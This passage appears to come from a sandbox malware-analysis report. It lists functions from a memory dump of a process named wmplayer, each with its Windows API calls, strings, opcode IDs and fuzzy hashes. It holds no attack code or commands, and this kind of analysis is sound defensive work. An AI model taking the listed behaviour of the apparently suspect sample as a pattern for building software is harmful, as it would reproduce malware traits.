                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1125800050-0
                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleSleep
                                                                                            • String ID: }A
                                                                                            • API String ID: 252777609-2138825249
                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • free.MSVCRT ref: 00409A31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3056473165-0
                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                            Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: realloc
                                                                                            • String ID: failed memory resize %u to %u bytes
                                                                                            • API String ID: 471065373-2134078882
                                                                                            • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                            • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                                                            • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                            • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: BINARY
                                                                                            • API String ID: 2221118986-907554435
                                                                                            • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                            • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /stext
                                                                                            • API String ID: 2081463915-3817206916
                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 2445788494-0
                                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                            Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                            Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                            • API String ID: 2803490479-1168259600
                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1065087418-0
                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1381354015-0
                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                            • String ID:
                                                                                            • API String ID: 2154303073-0
                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 3154509469-0
                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4232544981-0
                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FileModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 3859505661-0
                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
